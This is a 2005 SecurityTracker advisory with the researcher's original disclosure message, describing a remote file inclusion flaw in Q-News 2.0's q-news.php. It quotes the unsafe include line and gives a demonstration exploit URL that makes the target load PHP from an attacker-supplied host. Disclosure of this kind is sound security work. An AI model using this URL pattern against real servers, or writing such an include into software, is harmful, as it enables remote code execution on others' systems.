SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Q-News Vendors:  q-news.sourceforge.net
Q-News Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015277
SecurityTracker URL:  http://securitytracker.com/id?1015277
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 28 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:  ][GB][ reported a vulnerability in Q-News. A remote user can execute arbitrary code on the target system.

The 'q-news.php' script does not properly validate user-supplied input in the 'id' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/path_to_qnews/q-news.ph p?id=http://[attacker_url]
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/projects/q-news/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  gb.network@gmail.com
Message History:   None.

 Source Message Contents
Date:  Sat, 26 Nov 2005 22:28:24 +0000
From:  gb.network@gmail.com
Subject:  Remote file include in Q-News

 
Language: PHP
Script: Q-News
Version: 2.0
Official website: http://sourceforge.net/projects/q-news/
Problem: Remote file inclusion
Discovered by: ][GB][
 
Description:
===========
 
Q-News is a Quick News generator written in PHP that generates small text files that can be included 
a site,
it has a lot of configurable options such as Height, Width, Speed and Direction.
 
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "q-news.php" at line 17:

include ("$id.php"); 
 

Explotation example:
===================

http://[target]/path_to_qnews/q-news.php?id=http://[attacker_url]

 
Solution:
========
 
Not solution at this time.
 
 
Greetz:
=======
 
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
 
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #
f4kelive
   
irc.org.ve #uruguay, #venezuela
 
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC